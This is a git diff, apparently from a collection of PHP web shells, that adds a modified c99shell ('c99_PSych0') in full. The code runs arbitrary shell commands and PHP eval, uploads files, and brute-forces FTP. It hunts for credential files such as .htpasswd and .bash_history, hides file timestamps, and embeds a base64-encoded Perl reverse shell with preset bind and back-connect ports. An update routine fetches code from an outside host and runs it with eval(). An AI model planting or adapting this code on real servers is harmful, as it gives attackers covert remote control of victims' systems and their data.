::</b></p></td></tr> +<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE> +<br> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr> + <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1" checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td> + <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td> +</tr> +</table> +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table> +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table> +<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>powered by</b></u></a> Captain Crunch Security Team | <a href="http://ccteam.ru"><font color="#FF0000">http://ccteam.ru</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table> +</body></html><?php chdir($lastdir); c99shexit(); ?> diff --git a/php/PHPshell/c99_PSych0/c99_PSych0.jpg b/php/PHPshell/c99_PSych0/c99_PSych0.jpg new file mode 100644 index 0000000..417c354 Binary files /dev/null and b/php/PHPshell/c99_PSych0/c99_PSych0.jpg differ diff --git a/php/PHPshell/c99_PSych0/c99_PSych0.php b/php/PHPshell/c99_PSych0/c99_PSych0.php new file mode 100644 index 0000000..0969b91 --- /dev/null +++ b/php/PHPshell/c99_PSych0/c99_PSych0.php @@ -0,0 +1,3284 @@ +<?php +//Starting calls +ini_set("max_execution_time",0); +if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} +error_reporting(5); +$adires=""; +@ignore_user_abort(TRUE); +@set_magic_quotes_runtime(0); +$win = strtolower(substr(PHP_OS,0,3)) == "win"; +define("starttime",getmicrotime()); +if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} +$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); +foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} + +$shver = "1.0 pre-release build #16"; //Current version +//CONFIGURATION AND SETTINGS +if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} +elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} +else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL +} + +$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. + +if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} +if (empty($surl)) +{ + $surl = "?".$includestr; //Self url +} +$surl = htmlspecialchars($surl); + +$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. + +//Authentication +$login = ""; //login +//DON'T FORGOT ABOUT PASSWORD!!! +$pass = ""; //password +$md5_pass = ""; //md5-cryped pass. if null, md5($pass) + +$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") +$login_txt = "Restricted area"; //http-auth message. +$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied"; + +$gzipencode = TRUE; //Encode with gzip? + +$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) + +$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server +$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server + +$filestealth = TRUE; //if TRUE, don't change modify- and access-time + +$donated_html = "<center><b>C99 Modified By Psych0 </b></center>"; +/* If you publish free shell and you wish +add link to your site or any other information, +put here your html. */ +$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. + +$curdir = "./"; //start folder +//$curdir = getenv("DOCUMENT_ROOT"); +$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) +$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) + +$log_email = "user@host.tld"; //Default e-mail for sending logs + +$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending +$sort_save = TRUE; //If TRUE then save sorting-position using cookies. + +// Registered file-types. +// array( +// "{action1}"=>array("ext1","ext2","ext3",...), +// "{action2}"=>array("ext4","ext5","ext6",...), +// ... +// ) +$ftypes = array( + "html"=>array("html","htm","shtml"), + "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), + "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") +); + +// Registered executable file-types. +// array( +// string "command{i}"=>array("ext1","ext2","ext3",...), +// ... +// ) +// {command}: %f% = filename +$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); +if (empty($dizin)) {$dizin = realpath(".");} elseif(realpath($dizin)) {$dizin = realpath($dizin);} +$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); +if (substr($dizin,-1) != DIRECTORY_SEPARATOR) {$dizin .= DIRECTORY_SEPARATOR;} +$dizin = str_replace("\\\\","\\",$dizin); +$dizinispd = htmlspecialchars($dizin); +/*dizin*/ +$real = realpath($dizinispd); +$path = basename ($PHP_SELF); +function dosyayicek($link,$file) +{ + $fp = @fopen($link,"r"); + while(!feof($fp)) + { + $cont.= fread($fp,1024); + } + fclose($fp); + + $fp2 = @fopen($file,"w"); + fwrite($fp2,$cont); + fclose($fp2); +} + + + + +$exeftypes = array( + getenv("PHPRC")." -q %f%" => array("php","php3","php4"), + "perl %f%" => array("pl","cgi") +); + +/* Highlighted files. + array( + i=>array({regexp},{type},{opentag},{closetag},{break}) + ... + ) + string {regexp} - regular exp. + int {type}: +0 - files and folders (as default), +1 - files only, 2 - folders only + string {opentag} - open html-tag, e.g. "<b>" (default) + string {closetag} - close html-tag, e.g. "</b>" (default) + bool {break} - if TRUE and found match then break +*/ +$regxp_highlight = array( + array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example + array("config.php",1) // example +); + +$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. + // array (i=>{letter} ...); string {letter} - letter of a drive +//$safemode_diskettes = range("a","z"); +$hexdump_lines = 8;// lines in hex preview file +$hexdump_rows = 24;// 16, 24 or 32 bytes in one line + +$nixpwdperpage = 100; // Get first N lines from /etc/passwd + +$bindport_pass = "c99"; // default password for binding +$bindport_port = "31373"; // default port for binding +$bc_port = "31373"; // default port for back-connect +$datapipe_localport = "8081"; // default port for datapipe +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; + +// Command-aliases +if (!$win) +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "ls -la"), + array("find all suid files", "find / -type f -perm -04000 -ls"), + array("find suid files in current dir", "find . -type f -perm -04000 -ls"), + array("find all sgid files", "find / -type f -perm -02000 -ls"), + array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), + array("find config.inc.php files", "find / -type f -name config.inc.php"), + array("find config* files", "find / -type f -name \"config*\""), + array("find config* files in current dir", "find . -type f -name \"config*\""), + array("find all writable folders and files", "find / -perm -2 -ls"), + array("find all writable folders and files in current dir", "find . -perm -2 -ls"), + array("find all service.pwd files", "find / -type f -name service.pwd"), + array("find service.pwd files in current dir", "find . -type f -name service.pwd"), + array("find all .htpasswd files", "find / -type f -name .htpasswd"), + array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), + array("find all .bash_history files", "find / -type f -name .bash_history"), + array("find .bash_history files in current dir", "find . -type f -name .bash_history"), + array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), + array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), + array("list file attributes on a Linux second extended file system", "lsattr -va"), + array("show opened ports", "netstat -an | grep -i listen") + ); +} +else +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "dir"), + array("show opened ports", "netstat -an") + ); +} + +$sess_cookie = "c99shvars"; // Cookie-variable name + +$usefsbuff = TRUE; //Buffer-function +$copy_unset = FALSE; //Remove copied files from buffer after pasting + +//Quick launch +$quicklaunch = array( + array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl), + array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"), + array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"), + array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"), + array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""), + array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"), + array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"), + array("<b>Encoder</b>",$surl."act=encoder&d=%d"), + array("<b>Tools</b>",$surl."act=tools&d=%d"), + array("<b>Proc.</b>",$surl."act=processes&d=%d"), + array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"), + array("<b>Sec.</b>",$surl."act=security&d=%d"), + array("<b>SQL</b>",$surl."act=sql&d=%d"), + array("<b>PHP-code</b>",$surl."act=eval&d=%d"), + array("<b>Update</b>",$surl."act=update&d=%d"), + array("<b>Feedback</b>",$surl."act=feedback&d=%d"), + array("<b>Self remove</b>",$surl."act=selfremove"), + array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()") +); + +//Highlight-code colors +$highlight_background = "#c0c0c0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = "#000000"; + +@$f = $_REQUEST["f"]; +@extract($_REQUEST["c99shcook"]); + +//END CONFIGURATION + + +// \/Next code isn't for editing\/ +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} + +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or err(0); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function err($n,$txt='') +{ +echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>'; +echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; +if(!empty($txt)) { echo " $txt"; } +echo '</b></div></font></td></tr></table>'; +return null; +} +@set_time_limit(0); +$tmp = array(); +foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} +if (!empty($login)) +{ + if (empty($md5_pass)) {$md5_pass = md5($pass);} + if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) + { + if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));} + header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); + header("HTTP/1.0 401 Unauthorized"); + exit($accessdeniedmess); + } +} +if ($act != "img") +{ +$lastdir = realpath("."); +chdir($curdir); +if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} +$sess_data = unserialize($_COOKIE["$sess_cookie"]); +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} + +$disablefunc = @ini_get("disable_functions"); +if (!empty($disablefunc)) +{ + $disablefunc = str_replace(" ","",$disablefunc); + $disablefunc = explode(",",$disablefunc); +} + +if (!function_exists("c99_buff_prepare")) +{ +function c99_buff_prepare() +{ + global $sess_data; + global $act; + foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + $sess_data["copy"] = array_unique($sess_data["copy"]); + $sess_data["cut"] = array_unique($sess_data["cut"]); + sort($sess_data["copy"]); + sort($sess_data["cut"]); + if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} + else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} +} +} +c99_buff_prepare(); +if (!function_exists("c99_sess_put")) +{ +function c99_sess_put($data) +{ + global $sess_cookie; + global $sess_data; + c99_buff_prepare(); + $sess_data = $data; + $data = serialize($data); + setcookie($sess_cookie,$data); +} +} +foreach (array("sort","sql_sort") as $v) +{ + if (!empty($_GET[$v])) {$$v = $_GET[$v];} + if (!empty($_POST[$v])) {$$v = $_POST[$v];} +} +if ($sort_save) +{ + if (!empty($sort)) {setcookie("sort",$sort);} + if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if (strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0,$len)."...".substr($content,-$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if (!is_numeric($size)) {return FALSE;} + else + { + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + else {$size = $size . " B";} + return $size; + } +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (!is_dir(dirname($t))) {mkdir(dirname($t));} + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) {return copy($d,$t);} + else {return FALSE;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + $ret = TRUE; + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) + { + if(copy($d,$t)) {return unlink($d);} + else {unlink($t); return FALSE;} + } + else {return FALSE;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.$o)) {unlink($d.$o);} + else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} + } + } + closedir($h); + rmdir($d); + return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ + $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); + if (is_dir($o)) + { + if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return FALSE;} +} +} +if (!function_exists("myshellexec")) +{ +function myshellexec($cmd) +{ + global $disablefunc; + $result = ""; + if (!empty($cmd)) + { + if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} + elseif (($result = `$cmd`) !== FALSE) {} + elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_resource($fp = popen($cmd,"r"))) + { + $result = ""; + while(!feof($fp)) {$result .= fread($fp,1024);} + pclose($fp); + } + } + return $result; +} +} +if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} +if (!function_exists("view_perms")) +{ +function view_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + + $owner["read"] = ($mode & 00400)?"r":"-"; + $owner["write"] = ($mode & 00200)?"w":"-"; + $owner["execute"] = ($mode & 00100)?"x":"-"; + $group["read"] = ($mode & 00040)?"r":"-"; + $group["write"] = ($mode & 00020)?"w":"-"; + $group["execute"] = ($mode & 00010)?"x":"-"; + $world["read"] = ($mode & 00004)?"r":"-"; + $world["write"] = ($mode & 00002)? "w":"-"; + $world["execute"] = ($mode & 00001)?"x":"-"; + + if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} + if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} + if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} + + return $type.join("",$owner).join("",$group).join("",$world); +} +} +if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} +if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} +if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} +if (!function_exists("parse_perms")) +{ +function parse_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$t = "s";} + elseif (($mode & 0x4000) === 0x4000) {$t = "d";} + elseif (($mode & 0xA000) === 0xA000) {$t = "l";} + elseif (($mode & 0x8000) === 0x8000) {$t = "-";} + elseif (($mode & 0x6000) === 0x6000) {$t = "b";} + elseif (($mode & 0x2000) === 0x2000) {$t = "c";} + elseif (($mode & 0x1000) === 0x1000) {$t = "p";} + else {$t = "?";} + $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; + $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; + $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; + return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); +} +} +if (!function_exists("parsesort")) +{ +function parsesort($sort) +{ + $one = intval($sort); + $second = substr($sort,-1); + if ($second != "d") {$second = "a";} + return array($one,$second); +} +} +if (!function_exists("view_perms_color")) +{ +function view_perms_color($o) +{ + if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";} + elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";} + else {return "<font color=green>".view_perms(fileperms($o))."</font>";} +} +} +if (!function_exists("c99getsource")) +{ +function c99getsource($fn) +{ + global $c99sh_sourcesurl; + $array = array( + "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", + "c99sh_bindport.c" => "c99sh_bindport_c.txt", + "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", + "c99sh_backconn.c" => "c99sh_backconn_c.txt", + "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", + "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", + ); + $name = $array[$fn]; + if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} + else {return FALSE;} +} +} +if (!function_exists("c99sh_getupdate")) +{ +function c99sh_getupdate($update = TRUE) +{ + $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; + $data = @file_get_contents($url); + if (!$data) {return "Can't connect to update-server!";} + else + { + $data = ltrim($data); + $string = substr($data,3,ord($data{2})); + if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} + if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} + if ($data{0} == "\x99" and $data{1} == "\x03") + { + $string = explode("\x01",$string); + if ($update) + { + $confvars = array(); + $sourceurl = $string[0]; + $source = file_get_contents($sourceurl); + if (!$source) {return "Can't fetch update!";} + else + { + $fp = fopen(__FILE__,"w"); + if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";} + else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} + } + } + else {return "New version are available: ".$string[1];} + } + elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} + else {return "Error in protocol: segmentation failed! (".$data.") ";} + } +} +} +if (!function_exists("mysql_dump")) +{ +function mysql_dump($set) +{ + global $shver; + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + $ret["err"] = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = 0;} + if (empty($add_drop)) {$add_drop = TRUE;} + if (empty($file)) + { + $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = 